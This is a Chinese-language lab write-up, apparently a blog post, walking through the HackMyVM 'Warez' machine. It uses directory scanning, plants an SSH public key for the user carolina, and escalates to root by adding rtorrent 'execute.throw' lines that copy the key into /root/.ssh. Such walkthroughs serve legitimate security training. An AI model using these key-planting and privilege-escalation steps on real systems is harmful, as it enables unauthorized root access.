0x01基本信息
地址:https://hackmyvm.eu/machines/machine.php?vm=Warez
靶机ip:192.168.181.159
keli IP:192.168.181.129
0x02实施过程
首先进行ip扫描

于是打开网页进行查看

于是我进行目录扫描
gobuster dir -u http://192.168.181.159/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt

在访问的文件的过程中,发现/flags返回403,而且/robots.txt所指向的文件是/result.txt ,他是有一个权限目录
这些目录也没发现什么漏洞,于是还是回到首页

他提示我们有一个用户是carilina,那我们是不是可以将 公钥进行上传啊
于是我们将我们的公钥保存到authorized_keys文件下
cp ~/.ssh/id_rsa.pub authorized_keys

于是在kali上开启web服务

下载成功


于是我们进行ssh进行链接

于是获得第一个flag

于是进行提权

参考https://blog.youkuaiyun.com/AloneSword/article/details/47067333?locationNum=14,我们可以修改齐配置文件
execute.throw = mkdir, /root/.ssh
execute.throw = cp, /home/carolina/.ssh/authorized_keys, /root/.ssh/authorized_keys

于是使用rtorrent & 进行执行文件,于是使用使用ssh登录到root

于是获得最终的flag

0x003总结
这个网站是一个类似于CTF比赛的一个黑盒,,希望可以帮助大家有所提升

本文记录了通过网络扫描、目录遍历、SSH密钥上传,逐步破解Warez靶机的过程,包括发现隐藏用户、权限提升、配置修改和最终获取flag的详细步骤,适合CTF爱好者提升技术实践能力。
1085

被折叠的 条评论
为什么被折叠?



